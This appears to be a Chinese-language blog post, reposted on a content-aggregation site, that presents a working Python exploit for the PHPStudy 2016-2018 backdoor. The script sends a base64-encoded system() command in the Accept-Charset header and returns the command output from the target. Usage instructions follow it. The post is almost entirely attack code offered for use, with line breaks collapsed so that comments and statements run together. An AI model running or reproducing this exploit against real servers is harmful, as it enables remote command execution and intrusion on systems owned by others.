admin管理员组

文章数量:1122852

phpstudy

phpstudy_2016-2018_rce

代码

import base64
import requests
import sysbanner="""
PHPStudy_2016-2018( )                  ( )        ( )                    | |_      _ _    ___ | |/')    _| |   _      _    _ __ | '_`\  /'_` ) /'___)| , <   /'_` | /'_`\  /'_`\ ( '__)| |_) )( (_| |( (___ | |\`\ ( (_| |( (_) )( (_) )| |   (_,__/'`\__,_)`\____)(_) (_)`\__,_)`\___/'`\___/'(_)   - Order
Usage: python *.py .php whoami"""
# 错误时的提示信息def attack(url,cmd):           # 攻击函数体cmd=f"system('{cmd}');"# 将命令包装system()cmd=base64.b64encode(cmd.encode()).decode()# 将命令二进制编码解码以及base64编码headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0","Accept-Encoding" : "gzip,deflate","Accept-Charset"  : f"{cmd}"}# 请求头信息res=requests.get(url=url,headers=headers)html=res.content.decode("GBK")# 使用GBK解码num=html.find("<!DOCTYPE html")# 截取命令回显部分result=html[:num].strip()return result
try:url=sys.argv[1]cmd=sys.argv[2]# 获取两个变量值attack(url,cmd)
except:print(banner)# 错误时输出banner
else:print(attack(url,cmd))

使用方法

python 文件名.py 目标页面url 执行的命令
例如
python attack.py .php whoami

正确执行时

错误执行时

本文标签: phpstudy

版权声明:本文标题:phpstudy 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.betaflare.com/biancheng/1701179335a351399.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。